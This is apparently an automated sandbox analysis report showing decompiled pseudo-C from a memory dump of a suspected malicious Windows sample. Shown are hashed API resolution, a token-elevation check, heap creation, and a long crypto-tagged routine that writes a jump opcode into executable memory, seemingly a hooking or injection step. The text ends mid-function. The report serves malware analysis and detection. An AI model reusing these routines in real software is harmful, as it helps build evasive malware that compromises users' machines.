Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction ID: 4cbe60cd57a9234a6fcee002c5fed6f68157ff8bc33d42d8930a096b881b6e09
Opcode Fuzzy Hash: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction Fuzzy Hash: 16F0AFB56013096FF7359E1ADC44EB7FBEDEBC0B14F00851EB4D643240DA31A8218AA1

Uniqueness

Uniqueness Score: -1.00%

Function 733210CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E733210CC(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E73322F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E73322F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0xd0443454
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x733210da
0x733210dc
0x733210ea
0x733210ee
0x73321137
0x00000000
0x73321137
0x733210f3
0x733210f4
0x733210f6
0x733210fb
0x00000000
0x73321114
0x73321118
0x73321125
0x73321129
0x00000000
0x00000000
0x00000000
0x73321132

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,D0443454,00000004,D0443458,D0443458,D0443458), ref: 73321125

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction ID: 1fdeb2d728496d27cfd753814d62891a383008c275fa431d73b11c603ba215ed
Opcode Fuzzy Hash: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction Fuzzy Hash: 22F0A9B4B043467BFB2495288E04F7B2BAD5FC1602F00C828B541DA188EA78D8058321

Uniqueness

Uniqueness Score: -1.00%

Function 73323564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E73323564(void* __ecx) {
				void* _t3;
				intOrPtr* _t8;
				void* _t12;

				_t12 = __ecx;
				if( *0x7332d228 == 0xcd845700) {
					_t8 = E73322F8C(0xa5eabdf8, 0xd926c223);
					 *0x7332d22c = E73322F8C(0xa5eabdf8, 0x9b42cb07);
					if( *0x7332d228 == 0xcd845700) {
						 *_t8(2, 0, 0, 0, 0, 0); // executed
						 *0x7332d228 = 0;
					}
				}
				_t3 = E73322F8C(0xa5eabdf8, 0x80febacc);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t12);
					_push(8);
					_push( *0x7332d228);
					asm("int3");
					return _t3;
				}
			}

0x7332356c
0x73323574
0x733235a7
0x733235b8
0x733235c3
0x733235ce
0x733235d0
0x733235d0
0x733235c3
0x73323580
0x73323587
0x73323597
0x73323589
0x73323589
0x7332358a
0x7332358c
0x7332358e
0x7332358f
0x7332358f

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,A5EABDF8,9B42CB07,A5EABDF8,D926C223,?,?,00000000,7331DEB9,?,?), ref: 733235CE

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 2133d6c678bcdbb6aaa1567858af567b0785c9c68240c620a4460b44ff66bf60
Instruction ID: 4d64df2aa0ace198e9a3997483f2eb22dad8f1111b26cb295fb75868554b178c
Opcode Fuzzy Hash: 2133d6c678bcdbb6aaa1567858af567b0785c9c68240c620a4460b44ff66bf60
Instruction Fuzzy Hash: 60F0AE73608315BED3721B767C04F16BEDCEFC4537BB4842CB559EA080D6294440D662

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 73319144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E73319144(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				char _v60;
				intOrPtr _v92;
				void* _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				signed int _v116;
				char _v128;
				intOrPtr _v132;
				void* _v136;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v156;
				char _v160;
				signed int _v164;
				char _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				char _v196;
				void* _v200;
				signed int _v204;
				char _v208;
				char _v212;
				char _v216;
				intOrPtr _v220;
				intOrPtr _v228;
				intOrPtr _v236;
				void* _v268;
				char _v292;
				char _v308;
				char _v316;
				char _v320;
				void* _v324;
				char _v332;
				char _v340;
				void* _v356;
				void* _v360;
				char _v364;
				char _v380;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				intOrPtr _v400;
				signed int _v404;
				char _v408;
				void* _v412;
				char _v416;
				signed int* _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				intOrPtr _v440;
				signed int* _v444;
				char _v448;
				void* _v452;
				intOrPtr _v460;
				char _v464;
				void* _v468;
				char _v472;
				intOrPtr _v476;
				char _v480;
				void* _v484;
				char _v492;
				char _v496;
				void* _v500;
				char _v508;
				char _v516;
				signed int _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _v548;
				char _v552;
				char _v556;
				char _v560;
				signed int _v564;
				signed int _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				signed int _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t437;
				intOrPtr _t442;
				signed int _t444;
				char* _t459;
				char _t534;
				signed int _t544;
				intOrPtr _t546;
				signed int _t550;
				signed int _t556;
				intOrPtr _t561;
				signed int _t567;
				char _t579;
				intOrPtr _t584;
				char _t585;
				intOrPtr _t589;
				char _t590;
				intOrPtr _t594;
				char _t595;
				intOrPtr _t599;
				char _t600;
				intOrPtr _t604;
				char _t605;
				intOrPtr _t609;
				signed int _t622;
				char _t629;
				intOrPtr _t633;
				signed char* _t635;
				signed int _t638;
				intOrPtr _t641;
				signed int* _t647;
				signed int* _t650;
				intOrPtr _t665;
				char* _t806;
				signed int* _t836;
				char* _t837;
				char* _t844;
				void* _t845;
				intOrPtr* _t854;
				signed int* _t856;
				intOrPtr* _t857;
				signed int* _t858;
				signed int* _t860;
				signed int* _t863;
				intOrPtr _t864;
				intOrPtr _t867;
				char _t868;
				signed int _t869;
				intOrPtr* _t872;
				intOrPtr* _t874;
				intOrPtr* _t875;
				intOrPtr* _t876;
				intOrPtr* _t877;
				intOrPtr* _t878;
				signed int* _t881;
				intOrPtr* _t882;
				char* _t907;
				void* _t935;
				char _t950;
				char _t951;
				intOrPtr* _t953;
				void* _t954;
				intOrPtr* _t955;
				void* _t957;

				_t957 = __eflags;
				_t953 =  &_v496;
				_t641 = __edx;
				_v40 = __ecx;
				_t951 =  *((intOrPtr*)(__ecx + 0xc));
				E73322F8C(0x23627913, 0xae88daa3);
				_v496 = 0;
				E7331F620( &_v492, 0);
				_v480 = 0;
				_v476 = 0;
				E7331F620( &_v472, 0);
				_v528 = 0;
				E7331F620( &_v524, 0);
				_v392 = 0x4145240a;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x90], xmm0");
				E7331F8C4( &_v528, E7331F568( &_v528) + 0x10);
				E7331F558( &_v532, E7331F568( &_v532) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v540 = _v540 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v536 + 0x88)) = 0x22dc1034;
				asm("movq [ecx+0x90], xmm0");
				E7331F8C4( &_v536, E7331F568( &_v536) + 0x10);
				E7331F558( &_v540, E7331F568( &_v540) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v548 = _v548 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v544 + 0x88)) = 0xc06fd820;
				asm("movq [ecx+0x90], xmm0");
				E7331F8C4( &_v544, E7331F568( &_v544) + 0x10);
				E7331F558( &_v548, E7331F568( &_v548) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v556 = _v556 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v552 + 0x88)) = 0xa54975b2;
				asm("movq [ecx+0x90], xmm0");
				E7331F8C4( &_v552, E7331F568( &_v552) + 0x10);
				E7331F558( &_v556, E7331F568( &_v556) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v564 = _v564 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v560 + 0x88)) = 0x271e028;
				asm("movq [ecx+0x90], xmm0");
				E7331F8C4( &_v560, E7331F568( &_v560) + 0x10);
				E7331F558( &_v564, E7331F568( &_v564) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v572 = _v572 + 1;
				asm("pxor xmm0, xmm0");
				( &_v568)[0x22] = 0xf279aa39;
				asm("movq [ecx+0x90], xmm0");
				E7331F8C4( &_v568, E7331F568( &_v568) + 0x10);
				E7331F558( &_v572, E7331F568( &_v572) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t953 =  *_t953 + 1;
				E7332413C(0xa5eabdf8, _t953);
				E7331F558( &_v576, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x4c], xmm0");
				E7331F558( &_v580, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x54], xmm0");
				E7331F558( &_v584, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x64], xmm0");
				E7331F558( &_v588, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x6c], xmm0");
				E7331F558( &_v592, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x74], xmm0");
				E7331F558( &_v596, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x7c], xmm0");
				_v584 = _t951;
				E7331ADB8( &_v584,  &_v172, _t957,  &_v192);
				_t889 = _v176;
				_t931 = _v172;
				if((_v176 | _v172) != 0) {
					E7331B338( &_v308, _t951, __eflags, _t889, _t931);
					E7331F8DC( &_v516, __eflags);
					_v520 = 0;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v516 + 0x88)) = 0x5889e652;
					asm("movq [eax+0x8], xmm0");
					E7331F8C4( &_v516, E7331F568( &_v516) + 0x10);
					E7331F558( &_v520, E7331F568( &_v520) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v528 = _v528 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v524 + 0x88)) = 0x1eeb5e35;
					asm("movq [eax+0x8], xmm0");
					E7331F8C4( &_v524, E7331F568( &_v524) + 0x10);
					E7331F558( &_v528, E7331F568( &_v528) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v536 = _v536 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v532 + 0x88)) = 0xac5d5303;
					asm("movq [eax+0x8], xmm0");
					E7331F8C4( &_v532, E7331F568( &_v532) + 0x10);
					E7331F558( &_v536, E7331F568( &_v536) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v544 = _v544 + 1;
					_t954 = _t953 + 0xfffffff4;
					asm("movq xmm0, [esp+0x1bc]");
					asm("movq [esp], xmm0");
					_v548 =  &_v544;
					E7331BAB8( &_v340, __eflags);
					E7331F558( &_v552, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x5c], xmm0");
					E7331F558( &_v556, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x84], xmm0");
					_t935 = E7331F558( &_v560, 0x20);
					_v164 =  *((intOrPtr*)(_t935 + 8));
					_v144 =  *((intOrPtr*)(_t935 + 0xc));
					E7331F620( &_v396, 0);
					E7331F620( &_v416, 0);
					_push(0);
					_push( *0x7332b7c4);
					E733220A4(__eflags,  &_v100);
					E7331F75C( &_v416, __eflags);
					E7331E054( &_v100);
					E7331F8C4( &_v436, E7331F744( &_v420,  &_v100));
					_t437 = E7331F558( &_v424, 0);
					E73317970(_t951, _t437, E7331F558( &_v444, 0), _v112);
					_t442 = E7331F568( &_v448);
					_v228 = _t442;
					_t101 = _t442 + 2; // 0x2
					_v188 = E7331B0A4( &_v584, 0x20000000, __eflags, _t101);
					_v236 = 0x20000000;
					_t444 = E7331B0A4( &_v588, 0x80000000, __eflags, 0x82);
					_v184 = _t444;
					_v204 = 0x80000000;
					__eflags = _t444 | _v204;
					if((_t444 | _v204) == 0) {
						L51:
						E7331F6F0( &_v380);
						E7331F6F0( &_v364);
						E7331F6F0( &_v332);
						goto L1;
					}
					__eflags = _v116 | _v164;
					if((_v116 | _v164) == 0) {
						goto L51;
					}
					E733235D4( &_v292, 0, 0x80);
					_t955 = _t954 + 0xc;
					 *((intOrPtr*)( &_v316 + 0x78)) = _v20;
					E7331CDC0( &_v316, 0);
					_t459 =  &_v320;
					_t854 = _t459 + 0xe8;
					 *_t854 = _t641;
					 *((intOrPtr*)(_t854 - 4)) = _v20;
					_push(_t459);
					E7331B48C(_t641, _t459 - 0x20, _t854 - 4, _v20, _t951, _t951, _t854 - 4);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esp+0x134], xmm1");
					_v236 = E7331F568(_v20);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esi+0x8], xmm1");
					_v220 = E7331F568(_t641);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [ebx-0x90], xmm1");
					E73323C8C(_t951,  &_v60 - 0x80, __eflags, _v148, _v128, 7,  &_v60);
					_t133 =  &(( &_v564)[0x58]); // 0x160
					_t856 = _t133;
					 *_t856 = _v164;
					_t856[1] = ( &_v564)[0x69];
					E7331F8DC( &_v564, __eflags);
					_v568 = 0;
					_t746 =  &_v564;
					asm("pxor xmm0, xmm0");
					_t136 = _t746 + 0x88; // 0x88
					 *_t136 = 0x853cdd04;
					asm("movq [eax+0x8], xmm0");
					E7331F8C4( &_v564, E7331F568( &_v564) + 0x10);
					E7331F558( &_v568, E7331F568( &_v568) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v576 = _v576 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v572 + 0x88)) = 0xb162dc4e;
					asm("movq [eax+0x8], xmm0");
					E7331F8C4( &_v572, E7331F568( &_v572) + 0x10);
					E7331F558( &_v576, E7331F568( &_v576) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v584 = _v584 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v580 + 0x88)) = 0xc15ccc53;
					asm("movq [eax+0x8], xmm0");
					E7331F8C4( &_v580, E7331F568( &_v580) + 0x10);
					E7331F558( &_v584, E7331F568( &_v584) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v592 = _v592 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v588 + 0x88)) = 0x73f8f999;
					asm("movq [eax+0x8], xmm0");
					E7331F8C4( &_v588, E7331F568( &_v588) + 0x10);
					E7331F558( &_v592, E7331F568( &_v592) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v600 = _v600 + 1;
					_t762 =  &_v596;
					asm("pxor xmm0, xmm0");
					_t160 = _t762 + 0x88; // 0xa8
					 *_t160 = 0x4145240a;
					asm("movq [eax+0x8], xmm0");
					E7331F8C4( &_v596, E7331F568( &_v596) + 0x10);
					E7331F558( &_v600, E7331F568( &_v600) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v608 = _v608 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v604 + 0x88)) = 0xf06b4c6b;
					asm("movq [eax+0x8], xmm0");
					E7331F8C4( &_v604, E7331F568( &_v604) + 0x10);
					E7331F558( &_v608, E7331F568( &_v608) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v616 = _v616 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v612 + 0x88)) = 0x7d07f92f;
					asm("movq [eax+0x8], xmm0");
					E7331F8C4( &_v612, E7331F568( &_v612) + 0x10);
					E7331F558( &_v616, E7331F568( &_v616) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v624 = _v624 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v620 + 0x88)) = 0x2c2324e8;
					asm("movq [eax+0x8], xmm0");
					E7331F8C4( &_v620, E7331F568( &_v620) + 0x10);
					E7331F558( &_v624, E7331F568( &_v624) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t857 = _t955;
					 *_t857 =  *_t857 + 1;
					E7332413C(0xa5eabdf8, _t857);
					E7331F558( &_v628, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xf4], xmm0");
					E7331F558( &_v632, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xfc], xmm0");
					E7331F558( &_v636, 0x20);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x104], xmm0");
					E7331F558( &_v640, 0x30);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x10c], xmm0");
					E7331F558( &_v644, 0x40);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x114], xmm0");
					E7331F558( &_v648, 0x50);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x11c], xmm0");
					E7331F558( &_v652, 0x60);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x124], xmm0");
					E7331F558( &_v656, 0x70);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [ecx+0x118], xmm0");
					_t534 = E7331A5A4( &_v644, __eflags);
					_v524 = _t857;
					_t950 = _t534;
					__eflags = _t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff;
					if((_t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff) == 0) {
						L50:
						E7331B608(_t955 + 0xbc);
						E7331CDE0( &_v320, __eflags);
						goto L51;
					}
					_t858 =  &_v128;
					__eflags =  *_t858 | _t858[1];
					if(( *_t858 | _t858[1]) != 0) {
						L18:
						_v396 = 0;
						while(1) {
							__eflags = E7331AD68(0x80, _t950, _v400, _v112, _v132);
							if(__eflags != 0) {
								break;
							}
							_t605 = E7331A5A4( &_v520, __eflags);
							_v400 = 0x80;
							_t950 = _t605;
							__eflags = _t950 - 0xffffffffffffffff | 0x81;
							if((_t950 - 0xffffffffffffffff | 0x81) == 0) {
								goto L50;
							}
							_t878 =  &_v396;
							_t609 =  *_t878 + 1;
							 *_t878 = _t609;
							__eflags = _t609 - 0xa;
							if(_t609 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v396 = 0;
						while(1) {
							_push(0x80);
							_push(_v132);
							_push(_v112);
							_push(_v400);
							_push(_t950);
							_t860 =  &(( &_v520)[0x38]);
							__eflags = E7331A298( &_v520, _t860);
							if(__eflags != 0) {
								break;
							}
							_t600 = E7331A5A4( &_v540, __eflags);
							_v420 = _t860;
							_t950 = _t600;
							__eflags = _t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t877 =  &_v416;
							_t604 =  *_t877 + 1;
							 *_t877 = _t604;
							__eflags = _t604 - 0xa;
							if(_t604 != 0xa) {
								continue;
							}
							goto L50;
						}
						asm("cdq");
						asm("movd xmm1, eax");
						_v416 =  *((intOrPtr*)(_t955 + 0x1a4));
						_t647 =  &_v408;
						asm("movd xmm0, edx");
						asm("punpckldq xmm1, xmm0");
						 *_t647 = 0;
						 *((intOrPtr*)(_t647 - 4)) = _v188;
						asm("movq [edx], xmm1");
						_t544 = E73323BA0(_t951, _t647 - 8, __eflags,  &(_t647[0x48]), 0x40, _t647);
						__eflags = _t544;
						if(_t544 != 0) {
							goto L50;
						}
						_v180 = 0;
						while(1) {
							_t863 = _v184;
							__eflags = E7331AD68(_t863, _t950, _v420,  *((intOrPtr*)(_t955 + 0x1a8)), _v188);
							if(__eflags != 0) {
								break;
							}
							_t595 = E7331A5A4( &_v540, __eflags);
							_v420 = _t863;
							_t950 = _t595;
							__eflags = _t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t876 =  &_v180;
							_t599 =  *_t876 + 1;
							 *_t876 = _t599;
							__eflags = _t599 - 0xa;
							if(_t599 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v184 = 0;
						while(1) {
							_t546 = E7331F558( &_v404, 0);
							_push(E7331F568( &_v408));
							_push(_v192);
							_push(_v144);
							_push(_v424);
							_push(_t950);
							_t864 = _t546;
							__eflags = E7331A298( &_v544, _t864);
							if(__eflags != 0) {
								break;
							}
							_t590 = E7331A5A4( &_v560, __eflags);
							_v440 = _t864;
							_t950 = _t590;
							__eflags = _t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t875 =  &_v204;
							_t594 =  *_t875 + 1;
							 *_t875 = _t594;
							__eflags = _t594 - 0xa;
							if(_t594 != 0xa) {
								continue;
							}
							goto L50;
						}
						_t550 = E73323BA0(_t951,  &_v428 - 8, __eflags,  &_v428 + 0x120, _v428,  &_v428);
						__eflags = _t550;
						if(_t550 != 0) {
							goto L50;
						}
						E7331F620( &_v208, 0);
						_v100 = 0xe9;
						E7331F578( &_v100 - 0x70, __eflags,  &_v100, 1);
						_t650 =  &_v104;
						_t556 = _v172 -  *((intOrPtr*)(_t650 - 0x54)) + 0xfffffffb;
						__eflags = _t556;
						 *_t650 = _t556;
						E7331F578(_t650 - 0x74, __eflags, _t650, 4);
						_t907 =  &_v448;
						asm("movq xmm0, [0x7332b798]");
						 *((intOrPtr*)(_t907 - 8)) = _v196;
						 *((intOrPtr*)(_t907 - 4)) =  *((intOrPtr*)(_t907 + 0x110));
						asm("movq [ebx], xmm0");
						E73323BA0(_t951, _t907 + 0x120 - 0x128, __eflags, _t907 + 0x120, 0x40, _t907);
						_v192 = 0;
						while(1) {
							_t561 = E7331F558( &_v208, 0);
							_push(E7331F568( &_v212));
							_push(_v160);
							_push(_v180);
							_push(_v444);
							_push(_t950);
							_t867 = _t561;
							__eflags = E7331A298( &_v564, _t867);
							if(__eflags != 0) {
								break;
							}
							_t585 = E7331A5A4( &_v580, __eflags);
							_v460 = _t867;
							_t950 = _t585;
							__eflags = _t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff) == 0) {
								L49:
								E7331F6F0(_t955 + 0x174);
								goto L50;
							}
							_t874 =  &_v180;
							_t589 =  *_t874 + 1;
							 *_t874 = _t589;
							__eflags = _t589 - 0xa;
							if(_t589 != 0xa) {
								continue;
							}
							goto L49;
						}
						_v180 = 0;
						while(1) {
							_t955 = _t955 + 0xffffffd8;
							asm("pxor xmm0, xmm0");
							_v640 = _t950;
							_v636 = _v460;
							_t868 = _v196;
							_v632 = _t868;
							_v628 = _v176;
							_t806 =  &_v580;
							_v624 =  *((intOrPtr*)(_t806 + 0x198));
							_v620 =  *((intOrPtr*)(_t806 + 0x184));
							asm("movq [esp+0x18], xmm0");
							asm("movq [esp+0x20], xmm0");
							__eflags = E7331AD04(__eflags);
							if(__eflags != 0) {
								break;
							}
							_t579 = E7331A5A4( &_v616, __eflags);
							_v496 = _t868;
							_t950 = _t579;
							__eflags = _t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff) == 0) {
								goto L49;
							}
							_t872 =  &_v216;
							_t584 =  *_t872 + 1;
							 *_t872 = _t584;
							__eflags = _t584 - 0xa;
							if(__eflags != 0) {
								continue;
							}
							goto L49;
						}
						_push(0);
						_t869 = _v164;
						__eflags = _t869;
						_t870 =  !=  ? _t869 + 0xc : _t869;
						_push( !=  ? _t869 + 0xc : _t869);
						_t567 = E7331C3A8(_t869,  &_v416, 0x2710);
						E7331F6F0(_t955 + 0x184);
						E7331B608( &_v448);
						E7331CDE0( &_v416, __eflags);
						E7331F6F0( &_v480);
						E7331F6F0( &_v464);
						E7331F6F0( &_v432);
						E7331F6F0( &_v632);
						E7331B680( &_v592);
						E7331F6F0( &_v608);
						__eflags = _t567;
						return 0 | _t567 == 0x00000000;
					}
					_v388 = 0;
					do {
						E7331F620(_t955 + 0x188, 0);
						_push(0x23627913);
						_push(_t955 + 0x1cc);
						E73321D00();
						E7331DD7C(_t955 + 0x1d0 - 8, _t955 + 0x1d0);
						_t879 = 0x7fffffff;
						E7331F578( &_v168, __eflags, _v92, E7331E94C(_v92, 0x7fffffff));
						E7331E054( &_v100);
						E7331D098( &_v108);
						_t836 =  &_v176;
						_t665 =  *((intOrPtr*)(_t836 + 0x28));
						 *((intOrPtr*)(_t836 - 0xf0)) = _v156;
						__eflags = E7331F568(_t836);
						if(__eflags <= 0) {
							L12:
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0xac]");
							asm("pxor xmm1, xmm1");
							_t837 =  &_v528;
							_v588 = _t950;
							_v584 =  *((intOrPtr*)(_t837 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v572 =  *((intOrPtr*)(_t837 + 0x198));
							_v568 =  *((intOrPtr*)(_t837 + 0x184));
							asm("movq [esp+0x18], xmm1");
							asm("movq [esp+0x20], xmm1");
							_t622 = E7331AD04(__eflags);
							__eflags = _t622;
							if(_t622 != 0) {
								E7332218C(0x3e8, _t879, _t950);
								E7331F6F0( &_v196);
								E7331ADB8( &_v564,  &(( &_v172)[5]), __eflags,  &_v172);
								_t881 =  &_v176;
								__eflags =  *_t881 | _t881[1];
								if(__eflags != 0) {
									goto L18;
								}
								_t629 = E7331A5A4( &_v564, __eflags);
								_v444 = _t881;
								_t950 = _t629;
								__eflags = _t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff;
								if((_t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff) == 0) {
									goto L50;
								}
								goto L16;
							}
							L13:
							E7331F6F0( &_v196);
							goto L50;
						}
						_v404 = 0;
						while(1) {
							_t635 = E7331F558( &_v160, _v404);
							_t879 = _t635;
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0x94]");
							_t844 =  &_v532;
							asm("movq xmm1, [0x7332b790]");
							_v592 = _t950;
							_v588 =  *((intOrPtr*)(_t844 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v576 = _t665;
							_v572 =  *((intOrPtr*)(_t844 + 0x80));
							_v568 =  *_t635 & 0x000000ff;
							_v564 = 0;
							asm("movq [esp+0x20], xmm1");
							_t638 = E7331AD04(__eflags);
							__eflags = _t638;
							if(_t638 == 0) {
								goto L13;
							}
							_t845 = 0x64;
